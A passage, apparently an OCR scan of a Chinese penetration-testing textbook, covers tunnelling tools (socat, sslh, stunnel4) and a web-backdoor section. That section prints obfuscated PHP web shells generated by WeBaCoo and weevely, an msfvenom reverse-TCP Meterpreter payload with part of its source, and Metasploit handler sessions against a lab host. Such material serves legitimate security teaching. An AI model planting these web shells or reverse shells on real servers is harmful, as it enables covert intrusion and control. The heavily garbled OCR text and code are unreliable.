之 后 ，HTTP 服 务 器 病程 序 将 会 进行 回复 。 


HTTP/1.1 200 OK 


Date: Wed, 25 Dec 2013 15:27:19 GMT 
Server: Apache/2.2.8 (Ubuntu) DAV/2 
X-Powered-By: PHP/5.2.4-2ubuntu5.10 


Connection: close 


Content-Type: text/html 


2. 传输 文件 


要 从 主机 192.168.2.23 向 主机 192.168.2.23 发 送 文件 ， 需 要 以 下 几 


= 


1. 在 主机 192.168.2.23〈 接 收 端 ) 上 执行 下 述 指令 。 

socat TCP4-LISTEN:12345 OPEN:php-meter.php,creat,append 

socat 程 序 将 会 监听 12345 端 口 。 如 果 没 有 php-meter.php 这 个 文件 ， 
socat 将 会 创建 该 文件 ， 否 则 将 会 将 传输 内 容 续 写 Cappend) 到 文件 的 尾 
部 。 

2. 在 主机 192.168.22( 发 送 端 ) 上 执行 下 述 指令 。 

cat php-meter.php | socat — TCP4:192.168.2.23:12345 

3. 在 接收 端 ， 我 们 可 以 通过 ls 指令 看 到 socat 程 序 创建 了 有 关 文 
ft. 

-rw-r--r-- 1 msfadmin msfadmin 1315 2013-12-25 10:34 php-meter. php 

bia HI. SMe, RWC hin ke dh eee PST. 


11.2.7 sslh 











sslh 是 SSL/SSH 协 议 的 端口 复 用 程序 。 它 在 指定 端口 受理 连接 ， 然 
后 根据 远程 客户 端 发 送 的 第 一 个 数据 包 识 别 应 用 程序 的 连接 类 型 ， 并 将 
之 转发 到 相应 的 服务 端 程序 。 

目前 ，sslh 可 调度 HTTP、HTTPS、SSH、OpenVN、tinc 和 XMPP 协 
议 的 连接 。 

测试 人 员 通 常会 访问 远程 服务 器 的 HTTP, HTTPS. SSH, 
OpenVPN 和 其 他 协议 。 但 是 被 测 目 标的 服务 提供 商 可 能 会 只 开放 
80 Chttp) 端口 和 443 Chttps) 端口 ， 屏 蔽 相应 的 服务 端口 。 怎 么 穿越 
这 种 防火 墙 呢 ? 

sslh 程序 可 以 突破 这 些 障 碍 。sslh 程序 的 端口 复 用 功能 可 在 443 端 
口上 同时 受理 SSH 连 接 和 HTTPS 连 接 。 

如 需 启 动 sh 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# sslh 

上 述 指令 将 在 屏幕 上 显示 程序 的 使 用 方法 。 








在 使 用 sslh 程 序 之 前 ， 要 对 Web 服 务 器 端 程序 进行 调整 。 您 首先 要 
编辑 服务 器 程序 的 配置 文件 ， 使 其 仅 监 听 本 机 〈localhost) 的 443 端 口 。 
然后 重启 Web 服 务 器 端 程序 。 在 Kali Linux ARH, WS 
辑 /etc/apache2/ 目 录 下 的 ”ports.conf 文件 ， 修 改 ”mod_ssl 部 分 的 有 关 设 
置 。 

在 配置 文件 中 找到 以 下 内 容 。 

<IfModule mod_ssl.c> 

Listen 443 

</IfModule> 

把 它 修改 为 : 

<IfModule mod_ssl.c> 


Listen 127.0.0.1:443 


</IfModule> 

接 下 来 配置 sslh。 打 开 文 件 /etc/default/sslh， 并 找到 下 列 内 容 。 
Run=no 

TE LIAN AB HRA: 

Run=yes 


在 我 的 主机 上 ， 这 个 文件 的 内 容 如 图 11.16 所 示 。 





3t 3t 


Default options for sslh initscript 
sourced by /etc/init.d/sslh 


Disabled by default, to force yourself 

to read the configuration: 

- /usr/share/doc/sslh/README.Debian (quick start) 

- /usr/share/doc/sslh/README, at "Configuration" section 
- sslh(8) via "man sslh" for more configuration details. 
Once configuration ready, you *must* set RUN to yes here 
and try to start sslh (standalone mode only) 


"ok dk dk EH 


RUN=yes 


# binary to use: forked (sslh) or single-thread (sslh-select) version 
DAEMON=/usr/sbin/sslh 


DAEMON_OPTS="--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1 
:443 --pidfile /var/run/sslh/ssth.pid" 








图 11.16 


保存 文件 并 启动 sslh 服 务 。 

# /etc/init.d/sslh start 

[ ok ] Starting ssl/ssh multiplexer: sslh. 

此 外 ， 我 们 可 通过 下 述 指 令 检查 sslh 程 序 是 盏 在 正常 运行 。 
ps -ef | grep sslh 

上 述 指令 的 运行 结果 如 图 11.17 所 示 。 


root@kali:~# ps -ef | grep sslh 

SSLh 3531 1 9 15:32 ? 00:00:00 /usr/sbin/sslh --user sslh --1 
isten 0.0.0.0 443 --ssh 127.0.0.1 22 --ssl 127.0.0.1 443 --pidfile /var/run/ss 
Lh/sslh.pid 

SSLh 3534 3531 © 15:32 7 00:00:00 /usr/sbin/sslh --user sslh --1 
ran 0.0.0.0 443 --ssh 127.0.0.1 22 --ssl 127.0.0.1 443 --pidfile /var/run/ss 
h/sslh.pid 

root 3563 3399 0 15:33 pts/0 00:00:00 grep sslh 




















图 11.17 


上 述 信息 表明 sslh 运 行 正 常 。 
然后 ， 我 们 使 用 另 一 台 主 机 通过 443 端 口 连接 到 被 测 主机 的 SSH 服 
务 。 
ssh p 443 root@192.168.2.22 
H4 的 运行 结果 如 图 11.18 所 示 。 





The authenticity of host '[192.168.2.22]:443 ([192.168.2.22]:443)' can't be established. 
ECDSA key fingerprint is b0:c2:8d:54:83:68:d7:3e:09:14:00:62:9d:5a:d6:67. 

Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '[192.168.2.22]:443' (ECDSA) to the list of known hosts. 
root@192.168.2.22's password: 

Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0*kali8 x86 64 


The programs included with the Kali GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 
rootékali:-4 J 








图 11.18 
上 述 信 息 表明 ， 我 们 能 够 通过 443 端口 连接 到 Kali Linux 主机 的 SSH 
服务 。 


11.2.8 stunnel4 


stunnel4 可 以 使 用 SSL 技术 对 客户 端 和 服务 器 端 之 间 的 TCP 会 话 进 
行 加 密 传输 。stunnel4 可 以 为 本 身 无 法 进行 TLS 或 SSL 通 信 的 客户 端 及 服 
务 器 程序 提供 安全 的 加 密 连 接 ， 而 不 必修 改 这 些 程序 的 源 代 码 。 它 可 以 
封装 Samba、POP3、IMAP、SMTP 和 HTTP 协 议 。 

如 需 司 动 stunnel4 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# stunnel4 -h 

上 述 指令 将 在 屏幕 上 显示 程序 的 使 用 方法 。 

如 需 查 看 帮助 配置 文件 ， 可 以 指定 -help 选 项 。 

# stunnel4 -help 

上 述 指令 将 在 屏幕 上 显示 程序 的 帮助 配置 文件 。 

本 文 将 演示 使 用 stunnel4 加 密 MySQL 连 接 的 具体 方法 。 以 此 为 基 
础 ， 您 可 以 举一反三 地 使 用 stunnel 程 序 对 其 他 网 络 服务 的 连接 进行 SSL 
封装 。 

假设 服务 端 主机 的 IP 地 址 是 192.168.2.21 客 户 端 主机 的 IP 地 址 是 
192.168.2.22. 








首先 要 调整 服务 端 主机 的 相应 配置 。 
1. 创建 SSL 证 书 和 密 钥 。 
# openssl req -new —days 365 -nodes -x509 -out /etc/stunnel/ 


stunnel.pem -keyout /etc/stunnel/stunnel.pem 


2. 依照 程序 的 提示 ， 依 次 设置 国 别 、 省 份 、 通 用 名 和 E-mail 地 址 


的 信息 。 


3. 之 后 ，OpenSSL 程序 会 制作 SSL WEP. SSL 密 钥 和 证 书信 息 将 


会 保存 为 /etc/stunnel stunnel.pem. 


4. 调整 stunnel4 的 配置 文件 ， 使 其 在 3307 端 口上 提供 安全 连接 ， 并 


将 解密 后 的 数据 包 转 发 给 本 机 真正 的 MySQL 服务 器 端 程序 ， 即 将 下 述 
配置 信息 保存 为 配置 文件 /etc/stunnel/stunnel.conf。 





cert = /etc/stunnel/stunnel.pem 
setuid = stunnel4 
setgid = stunnel4 
pid = /var/run/stunnel4/stunnel4.pid 
[mysqls] 
accept = 0.0.0.0:3307 
connect = localhost:3306 
5. 修改 文件 /etc/default/stunnel4， 使 其 可 以 自动 启动 。 
ENABLED=1 
6. 局 动 stunnel4 服 务 。 
#/etc/init.d/stunnel4 start 
Starting SSL tunnels: [Started: /etc/stunnel/stunnel.conf] stunnel. 
7. 检查 stunnel4 是 否 监 听 了 3307 端 口 。 
# netstat -nap | grep 3307 
8. 上 述 指令 的 运行 结果 如 下 。 
tcp 0 00.0.0.0:3307 0.0.0.0:* 


LISTEN 8038/stunnel4 
9. 上 述 信 息 表明 ，stunnel4 工 作 正常 。 
ee 按照 以 下 步骤 配置 客户 端 主机 。 
.调整 stunnel4 的 配置 文件 ， 使 其 在 3306 端 口上 受理 MySQL 客 户 端 
oe 并 将 这 个 连接 转发 给 远 端 stunnel 服 务 端 主机 的 3307 端 口 。 将 下 
述 配置 信息 保存 为 配置 文件 /etc/stunnel/stunnel.conf 。 


client = yes 





[mysqls] 
accept = 3306 
connect = 192.168.2.21:3307 
2. 修改 文件 /etc/default/stunnel4， 使 其 可 以 自动 启动 。 
ENABLED=1 
3. 局 动 stunnel4 服 务 。 
#/etc/init.d/stunnel4 start 
使 用 下 述 指 令 查 看 stunnel4 服 务 的 运行 状态 是 否 正 常 。 
netstat -napt grep stunnel4 
在 我 们 的 演示 系统 上 ， 上 述 指令 的 输出 结果 如 下 。 
tcp 000.0.0.0:3306 0.0.0.0:* 
LISTEN 2860/stunnel4 
4. 通过 下 述 指令 通过 stunnel 的 隧道 连接 MySQL 服 务 器 。 
m -u root -h 127.0.0.1 
上 述 指令 的 运行 结果 如 图 11.19 所 示 。 





root@kali:~# mysql -u root -h 127.0.0.1 

Welcome to the MySQL monitor. Commands end with ; or \g. 
our MySQL connection id is 37 

Leia version: 5.5.32-O0ubuntu0.12.04.1 (Ubuntu) 


Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved. 
Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 


owners. 


Type 'help;' or 'Ah' for help. Type ‘\c' to clear the current input statement. 








mysql» 
图 11.19 
5 而后， 打开 Wireshark 程 序 ， 再 在 MySQL 客 户 端 里 执行 下 述 指 


4 


show databases; 


在 Wireshark 里 ， 我 们 只 能 能 看 到 图 11， 20 所 示 的 数据 。 
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此 时 已 经 使 用 SSL 技 术 对 程序 的 连接 进行 了 加 密 ， 所 以 我 们 无 法 看 
到 任何 明文 。 
相 比 之 下 ， 如 果 不 使 用 stunnel 程序 加 密 网 络 数据 ， 那 么 在 进行 相 


同 数据 库 但 询 时 ， WireShark 就 能 够 截获 出 数据 库 数 据 的 明文 〈 见 图 
11.21): 








I" 
5. 5. 32-OubuntuO.12.04.1.6...-3U3»-"*t...... cce eee nn R: ] *00" Uh 
+=0.mysql_ native | password. < M PRAE root..mysql native passwor 
EROGO select (QQversion comment limit 
"HN "evrarsipn CONES. ues xx EE RE eee (büntul. eek s.s show 
Hatabases ee K.. Es „def. information schema.SCHEMATA.SCHEMATA.Database.SCHEMA NAM 
E Loses €— information schema..... mysql..... performance schema..... tes 
| uno 8/8 - 
图 11.21 








在 网 络 里 进行 监听 可 发 现 大 量 信息 ， oe 尔 和 软件 版 
本 号 码 、 操 作 系 统 、 数 据 库 的 登录 用 户 名 和 密码 ， 以 及 数据 库 里 的 库 名 
等 敏感 信息 。 





11.3 创建 Web 后 门 





下 文 将 介绍 多 球 Web 后 门 工具 ， 这 类 工具 通常 用 于 维护 控制 权 。 
需要 指出 的 是 ，IDS、 杀 毒 软件 和 安全 工具 可 能 会 检测 出 这 些 后 
门 。 如 果 对 后 门 的 隐匿 性 有 较 高 要 求 ， 您 需要 创建 自己 专用 的 后 门 程 





在 本 节 的 演示 过 程 中 ， 各 主机 和 IP 地 址 的 对 应 关系 如 下 : 
e 攻击 人 员 的 主机 使 用 的 IP 是 192.168.2.22; 
e 目标 主机 的 IP 地 址 是 192.168.2.23。 


11.3.1 WeBaCoo 


WeBaCoo (Web Backdoor Cookie) 是 一 款 隐 牙 的 脚本 类 Web 后 门 
工具 。 借 助 HITP 协 议 ， 它 可 在 客户 器 和 Web 服 务 器 之 间 实 现 执行 代 码 
的 网 页 终端 

WeBaCoo 有 两 种 操作 模式 。 

e Generation (生产 线 模 式 ) : 指定 -g 选项 可 进入 这 种 模式 。 用 户 
可 在 这 种 模式 下 制作 PHP 代 码 的 payload。 








e Terminal (终端 模式 ) : 指定 -t 选项 可 进入 这 种 模式 。 用 户 可 在 
这 种 模式 下 连接 到 被 测 主机 的 后 门 程序 。 

WeBaCoo 的 精妙 之 处 在 于 ，Web 服 务 器 和 客户 端 之 间 的 通信 载体 是 
Cookie。 这 就 意味 着 多 数 的 杀毒 软件 、 网 络 入 侵 检 测 / 防 御 系 统 、 网 络 防 
火 墙 和 应 用 程序 防火 墙 都 无 法 检测 到 后 门 的 存在 。 

在 WeBaCoo 的 HTTP Cookie 中 ， 以 下 三 个 参数 的 作用 最 为 重要 。 

e cm: 以 Base64 编码 的 shell 指令 。 

e cn: 加 载 着 编码 后 输出 内 容 的 Cookie 名 称 。 

e cp: 封装 编码 后 输出 内 容 的 分 隔 符 。 

如 需 启 动 WeBaCoo 程 序 ， 可 在 终端 中 执行 下 述 指令 。 

# webacoo -h 

上 述 指令 将 会 显示 程序 的 使 用 说 明 。 本 文 首先 介绍 制作 后 门 的 具体 
对: 

与 生成 模式 有 关 的 命令 行 选项 如 下 。 











制作 后 门 代 码 
后 门 所 需 的 PHP 功能 : 
e system(default) 





shell exec 

exec 

passthru 

popen 

指定 生成 的 后 门 程序 的 文件 名 


如 果 要 用 默认 的 设置 ， 生 成 名 为 test.php 的 PHP 后 门 程 序 ， 并 使 用 
WeBacCoo 的 代码 混 消 技 术 对 后 门 进行 处 理 ， 那 么 可 以 使 用 下 述 指令 。 
# webacoo -g -o test.php 
上 述 指令 的 运行 结果 如 下 。 
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit 
Copyright (C) 2011-2012 Anestis Bechtsoudis 
{@anestisb | anestis@bechtsoudis.com | http(s)://bechtsou dis .com } 





[+] Backdoor file "test.php" created. 
文件 test.php 的 内 容 如 图 11. 22 所 未 à 





?php $bsstrrev("edoced 4"."6esab");eval($b(str replace(" ","","aWYoaXNzZXQoJF9DTOSLSUVbJ2N 
J10pKXtvYl 9z d 6 Fydcgp03 NS5c3RtbShiYXxN1 NjRfZGVjb2RlKCRfÉQOSPSO 
FWydjbSddKS4nIDI*JjEnKTtzZXRjb29raWwUoJF9SDTOG9SLSUVbJ2NuJ10sJ 
9DnTOGO9SLSUVbJ2NwJIQGuYmFzzTYOX2VuY29kZShvYl9gnzxRfÉY29udGVudHMo 
SkuJF9DTG9LSUVbJ2NwJ10p029iX2VuzF9jbGVhbigpo390295")); ?> 





而 后 ， 把 这 个 文件 上 传 到 被 测 主机 (192.168.2.23) 。 
接 下 来 就 可 以 使 用 以 下 指令 连接 到 被 测 主 机 的 后 门 程序 。 
# webacoo -t -u http://192.168.2.23/test.php 

这 样 就 可 以 连接 到 主机 上 的 Web shell 〈 见 图 11.23) 





WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit 
@anestisb anestis@bechtsoudis.com http(s) ://bechtsoudis.com 


[+] Connecting to remote server as... 
uid-33(www-data) gid=33(www-data) groups=33(www-data) 


[*] Type 'load' to use an extension module. 
[*] Type ':«cmd»' to run local OS commands. 
[*] Type 'exit' to quit terminal. 





iebacoo$ id 
rre m gid-33(www-data) groups-33(www-data) 
vebacoo$ uname -a 


inux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
webacoo$ q 





图 11.23 
防火 增 和 代理 服务 器 只 能 够 发 现 客户 端 在 发 送 如 下 请 求 〈 见 图 


11.24) 


GET /test.php HTTP/1.1 

Host: 192.168.2.23:80 

Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2 
Connection: Close 

Cookie: cm2 aWQz; cn=M-cookie; cp=8zM$ 


图 11.24 
服务 端的 啊 应 信息 如 下 《〈 见 图 11.25) . 

















HTTP/1.1 200 OK 

Date: Sun, 15 Sep 2013 16:41:21 GMT 

Server: Apache/2.2.8 (Ubuntu) DAV/2 

X-Powered-By: PHP/S.2.4-2ubuntuS.10 

Set-Cookie: M-cookie- 82M9624dWIkPTMzKHd3dylkYxRhKSBnawQ9MzMod3d3LWRhdGEplGdyb3Vwcz0zMyh3d3ct ZGFOYSkK82M962: 
Content-Length: 0 

Connection: close 

Content-Type: text/html 








[11.25 
-EXSHTTP 请 求 和 回复 信息 表明 ，WeBaCoo 后 门 的 客户 端 和 服务 器 
端的 通信 是 不 易 发 现 的 加 密会 话 。 它 所 用 的 混淆 技术 降低 了 它 被 发 觉 的 
可 能 性 。 
退出 WeBaCoo 终 端 模式 的 指令 是 exit。 





11.3.2 weevely 
weevely 是 一 蒜 具 有 高 隐蔽 性 的 针对 PHP 平台 的 Web shell。 它 实现 
了 SSH 风格 的 终端 界面 ， 并 有 大 量 自动 化 的 模块 。 测 试 人 员 可 用 它 执 行 
系统 指令 、 远 程 管理 和 渗透 后 期 的 自动 渗透 。 
下 面 是 weevely 的 主要 功能 Chttps://github.com/epinna/Weevely ) 。 
e 它 有 30 多 种 可 完成 自动 管理 渗透 后 期 任务 的 功能 模块 。 这 些 模块 





o 执行 命令 和 浏览 远程 文件 系统 ; 

o 检测 常见 的 服务 器 配置 问题 ; 

o 创造 TCP shell 和 reverse shell; 

o 在 被 测 主 机 上 安装 HTTP 代 理 ; 

o 利用 目标 主机 进行 端口 扫描 。 

e 使 用 HTTP Cookie 作为 后 门 通信 的 载体 。 
e 文 持 密码 认证 。 

如 需 启动 weevely 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 
# weevely 

上 述 指令 将 会 在 屏幕 上 显示 程序 的 使 用 说 明 。 
weeavely 的 主要 用 途 是 : 








e 生成 混 消 PHP backdoor; 

e 在 图 像 文 件 中 退 加 多 态 的 后 门 程序 ， 并 可 通过 .htaccess 文件 赋予 
图 像 文件 执行 权限 ; 

e AR 门 .htaccess 文件 。 

e 可 通过 help 选项 列 出 程序 的 全 部 模块 和 生成 工具 。 

# weevely help 

下 列 指令 可 生成 混淆 PHP backdoor， 并 将 后 门 保存 为 display.php。 

# weevely generate password display.php 





[generate.php] Backdoor file 'display.php' created with password 





password 
上 述 指令 生成 的 display.php 的 内 容 如 图 11.26 所 示 。 
?php 
$usoa = str replace("u","","usturu urueupluaucue"); 


$taof-"JGM9J2Nvdw50JzskYTOkXONt ePTOt JRTtpZihyZXNldCtegkYSk9PSdwYStecgJteiYgJGMoJGEpP j M" ; 
z zddj= "peyRrPSdzc3dvcmQn02Vj aG8gJzwnLteiRrLic+Jztlt edmFsKGJtehc2U2NF9kZWteNvZteGUteocHJLZ19teyZXBsYt 


4ijiu=， 'WNLKGteFycmF5KCc vWtel5cdzlcclOvJywnLlxzLytecpLCBhtecnJheSgnteJywnKycpLCBqb2telu"; 
$zkbj- "KGteFytecmFteS5teX3NsaWNlteKt eCRhLCRj KCRhKSOz KStekpKSk7ZWNotebteyAnPC8nLiRrLic+Jz tet9"; 
$txal = $usoa("x", "", "bxaxsex6x4 xdexcxoxde"); 





$dvkx = $usoa("fj","","crfjefjatfjefj fjffjunfjcfjtfjiofjn"); 
$qoaq = $dvkx('', $txal($usoa("te", "", $taof.$zddj .$ijiu.$zkbj))); $qoaq(); 
?> 





图 11.26 

然后 通过 正常 的 途径 或 利用 程序 的 漏洞 ， 把 后 门 文件 上 传 到 目标 服 
务 器 上 。 

然后 使 用 下 述 命令 访问 被 测 主 机 (192.168.2.23) 的 Web shell. 

# weevely http://192.168.2.23/display.php password 

只 要 连接 成 功 ， 您 就 能 连接 到 weevely 的 Web shell 上 。 为 了 检测 功 
能 是 否 正 常 ， 我 们 可 在 Web shell 中 执行 .net.ifaces 指令 以 获取 远程 主机 
的 网 络 接口 信息 。 男 外 ， 我 们 还 可 以 运行 id 指 令 查 看 当前 用 户 的 ID〈 见 
图 11.27) 。 


root@kali:~# weevely http://192.168.2.23/display.php password 


mn — 
Stealth tiny web shell 


| v1.0 
| 


EL 

| | | 
kÁ 
= 

[+] Welcome to Weevely. Browse filesystem and execute system commands. 
[+] Use ':help' to list available modules and run selected one. 


[shell.php] [!] Error: No response 
msfadminQ:/var/www $ :net.ifaces 


| 127.0.0.1/8 
| ethó | 192.168.2.23/24 | 


msfadminQ:/var/www $ id 
uid-33(www-data) gid-33(www-data) groups-33(www-data) 
msfadmin@:/var/www $ lj 





图 11.27 
上 述 信息 表明 ， 我 们 成 功 地 连接 到 被 测 主机 的 Web shell。 在 此 shell 
上 ， 您 可 以 在 远程 主机 上 执行 其 他 命令 。 例 如 ， 您 可 通过 :help 指 令 查 看 
weevely 支 持 的 各 种 指令 〈 见 图 11.28) 


| module description | 
= 
| :audit.userfiles 
| :audit ,etcpasswd 
| :audit .mapwebfiles 
| :shell .php 
| :shell .sh 
| :system.info 
| :backdoor.tcp 
| :backdoor.reversetcp 
| :bruteforce.sql 
| :bruteforce.sqLusers 
| :file.upload 
| :file.rm 

| :file.enum 
| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

| 





Enumerate common users restricted files | 
Enumerate users and /etc/passwd content | 
Enumerate webroot files properties | 
PHP shell | 
System shell | 
Collect system informations | 
Open a shell on TCP port | 
Send reverse TCP shell | 
Bruteforce SQL username | 
Bruteforce all SQL users | 
Upload binary/ascii file to the target filesystem | 
Remove remote files and folders | 
Check remote files type, md5 and permission | 
: file.upload2web | 
: file.download | 
| 

| 

| 

| 

| 

| 

| 

| 

| 

| 


Upload binary/ascii file into web folders and guess corresponding url 
Download binary/ascii files from target filesystem 





:file.check Check remote files type, md5 and permission 

:file. read Read files from target filesystem 

:sql .console Execute SQL queries 

:sql . dump Get SQL database dump 

:Net .proxy Install and run Proxy to tunnel traffic through target 
:net .phpproxy Install remote PHP proxy 

:net .ifaces Print interface addresses 

:net .Scan Print interface addresses 

:find.suidsgid Find files with superuser flags 

:find.perms Find files with write, read, execute permissions 


+ 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 + 一 








图 11.28 
例如 ， 我 们 可 以 使 用 下 述 指令 扫描 被 测 主机 的 22 痊 口 。 
msfadmin@:/var/www $ :net.scan 192.168.2.23 22 
SCAN 192.168.2.23:22-22 OPEN: 192.168.2.23:22 
tuf DAF cl 35: 13-3368 EI 5 JS? H o 
msfadmin@:/var/www $ :net.scan 192.168.2.23 80 
SCAN 192.168.2.23:80-80 OPEN: 192.168.2.23:80 
您 可 随时 使 用 组 合 键 Ctrl+C 退出 weevely shell. 
weevely 程 序 只 能 制作 PHP 脚本 的 Web shell， 如 需 创 建 其 他 脚本 的 


Web shell， 可 考虑 Laudanum Chttp://laudanum.inguardians. com/) . 
Laudanum 除 了 有 具备 Web shell 的 功能 之 外 ， 还 有 DNS 碍 询 、 获 取 LDAP 信 
息 等 其 他 功能 。 它 支持 ASP、ASPX、CFM、JSP 和 PHP 脚 本 。 


11.3.3 PHP Meterpreter 
Metasploit 有 一 个 名 为 PHP Meterpreter 的 payload。 这 个 模块 可 以 创 


建 具有 Meterpreter 功 能 的 PHP Web shell。 利 用 目标 的 漏洞 (诸如 常见 的 
注入 和 上 传 漏洞 ) 之 后 ， 再 把 它 的 shell 传 到 目标 主机 即 可 。 


Fe 


Metasploit 的 msfvenom 工具 可 以 制作 PHP meterpreter， 具 体 指令 如 
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.23 -f raw 


php-meter.php 

上 述 指令 各 选项 的 作用 如 下 。 

e-p: 指定 payload 为 php/meterpreter/reverse_tcp。 

e-f: 设置 输出 格式 Craw) 。 

eLHOST: 设 定 目 标 主机 的 IP 地 址 。 

Metasploit 会 把 生成 的 PHP meterpreter 保存 为 文件 php-mter.php。 这 


个 文件 的 部 分 内 容 如 图 11.29 所 示 。 
#<?php < 


error reporting(0); 

# The payload handler overwrites this with the correct LHOST before sending 
# it to the victim. 

$ip = '192.168.2.22'; 

$port = 4444; 

$ipf = AF_INET; 





if (FALSE !== strpos($ip, ":")) { 
# ipv6 requires brackets around the address 
$ip = "wu. $ip Ra ko- 
$ipf = AF_INET6; 

} 


if (($f = 'stream socket client') && is callable($f)) ( 
$s = $f("tcp://($ip):($port) ") ; 
$s type = 'stream'; 

} elseif (($f = 'fsockopen') && is callable($f)) ( 
$s = $f($ip, $port); 








图 11.29 
如 网 11.29 所 示 ， 在 上 传 后 门 到 被 测 主机 之 前 ， 首 先 要 删除 脚本 第 
一 行 的 注释 。 
其 次 ， 我 们 还 要 在 攻击 主机 上 作 好 受理 PHP Meterpreter 的 准备 。 在 





Kali 的 主机 上 启动 Metasploit Console (msfconsole) ， 并 启动 
multi/handler exploit。 然 后 指定 制作 shell 后 门 时 用 过 的 





php/meterpreter/reverse_tcp payload。 接 下 来 把 变量 LHOST 设 置 为 Kali 
主机 的 卫 地 址 。 在 此 之 后 ， 使 用 exploit 指令 运行 exploit 的 受理 程序 


(handler) 。 上 述 指令 的 运行 结果 如 图 11.30 所 示 。 
msf> use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter/reverse tcp 
payload => php/meterpreter/reverse tcp 
msf exploit(handler) > set LHOST 192.168.2.22 
LHOST => 192.168.2.22 
msf exploit(handler) > exploit 





[*] Started reverse handler on 192.168.2.22:4444 
[*] Starting the payload handler... 


图 11.30 








在 利用 注入 或 者 远程 文件 包含 漏洞 等 web 漏洞 之 后 ， 把 Web shell 
上 传 到 目标 服务 器 。 此 后 ， 您 就 可 以 通过 Web 浏 览 器 访问 shell CALA 
11.31) 。 
@ Connecting... 





Warning: Never expose this VM to an untrusted network! 


Contact: msfdev[at]metasploit.com 


Login with msfadmin/msfadmin to get started 





图 11.31 
在 运行 Kali 的 测试 主机 上 ，Metasploit 程 序 将 会 显示 Meterpreter 会 话 
〈 见 图 11.32) 。 


[*] Sending stage (39848 bytes) to 192.168.2.23 
[*] Meterpreter session 1 opened (192.168.2.22:4444 -> 192.168.2.23:49372) at 2013-12-25 21:57:27 «0700 





meterpreter > sysinfo 
Computer : metasploitable 
OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 
Meterpreter : php/php 
r » getuid 
Server username: www-data (33) 
meterpr r> 





图 11.32 





此 时 ， 您 就 可 以 使 用 sysinfo 和 getuid 之 类 的 Meterpreter 指 令 。 


11.4 本 童 总 结 





本 章 通 过 cymothoa、intersect、metsvc 工 具 的 有 关 介 绍 ， 讲 解 了 后 门 
程序 的 具体 应 用 。 后 门 是 维持 对 目标 主机 控制 权 的 有 效 手 段 。 

接 下 来 ， 本 章 介绍 了 隧道 工具 。 隧 道 工 具 可 以 用 某 种 协议 封 狠 男 一 
种 协议 ， 以 绕 过 目标 系统 上 的 屏 菩 对 外 连接 的 限制 机 制 。 相 关 篇 幅 介绍 
了 dns2tcp、iodine、ncat、proxychains、ptunnel、socat、sslh 和 stunnel4 的 
f FIRE 

最 后 ， 本 章 简要 介绍 了 制作 Web shell 的 Web 后 门 工具 。 把 Web 
shell 上 传 到 目标 服务 器 之 后 ， 我 们 就 可 以 连接 到 后 门 程 序 。 

下 一 章 将 会 讲解 整理 文档 、 书 写 报告 ， 以 及 向 客户 讲解 在 渗透 测试 
中 发 现 的 安全 隐患 的 有 关 方 法 。 
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专业 的 渗透 测试 要 对 评估 结果 进行 退 踪 ， 所 以 渗透 测试 也 要 有 正规 
的 记录 卷 罕 。 把 各 种 测试 工具 的 输入 和 输出 记录 进行 文档 化 管理 ， 可 保 
证 评估 结果 的 准确 性 、 一 致 性 和 可 再 现 性 。 渗 透 测试 这 个 部 分 的 工作 ， 
可 能 会 涉及 同 客户 演示 评估 结果 的 工作 。 应 当 严 肃 对待 这 个 环节 的 工 
作 。 麻 些 客户 都 会 对 已 有 漏洞 进行 缓解 控制 ， 然 后 模拟 测试 人 员 的 测试 
过 程 ， 以 验证 改进 措施 的 有 效 性 ; 另 一 些 客户 可 能 会 通过 合同 要 求 测 试 
人 员 进行 再 次 测试 ， 以 验证 客户 改进 方案 的 效果 。 使 用 准确 的 语言 把 测 
试 的 各 个 步骤 整理 为 有 关 卷 宗 ， 有 助 于 您 在 这 个 环节 中 进行 相同 的 验证 























性 测试 。 
测试 的 卷宗 应 当 记 录 下 测试 工作 中 的 全 部 测试 行为 。 在 渗透 测试 的 





时 间 窗 口内， 万 一 甲 方 的 业务 受到 测试 以 外 的 因 系 的 影响 ， 这 些 郑 穴 将 
能 证 明 您 的 测试 内 容 。 虽 然 记录 操作 行为 的 这 种 事情 乏味 而 枯燥 ,但 是 
专业 的 渗透 测试 人 员 会 非常 注重 这 项 工作 。 

要 精心 准备 涉及 核心 领域 的 文档 、 汇 报 和 现场 演示 ， 注 重 内 容 的 全 
局 性 、 条 理性 和 连贯 性 。 本 章 会 详细 介绍 有 关 工 作 的 要 点 ， 指 导读 者 通 
盘 考 虑 文档 和 报告 工作 的 策略 。 本 章 将 会 涉及 以 下 主题 。 

e 验证 测试 结果 ， 毕 苋 汇报 的 内 容 应 当 是 经 过 验证 的 测试 结论 。 

e. 渗透 测试 项 目 时 利 涉 及 客户 的 行政 层 、 管 理 层 、 技 术 层 。 不 同 层 
面 的 人 员 对 测试 项 目 有 着 不 同 的 关注 点 。 本 文 将 讨论 分 别 满足 他 们 需求 
的 报告 类 型 和 报告 结构 。 

e 演示 一 节 将 介绍 如 何 根据 听众 水 平 准备 适当 的 演示 材料 。 

e 渗透 报告 都 要 有 测试 的 后 期 工作 、 改 正方 法 和 改进 建议 。 这 部 分 
将 帮助 有 关 部 门 进行 整 改 。 要 提出 专业 的 整改 意见 ， 就 要 从 安全 的 角度 




















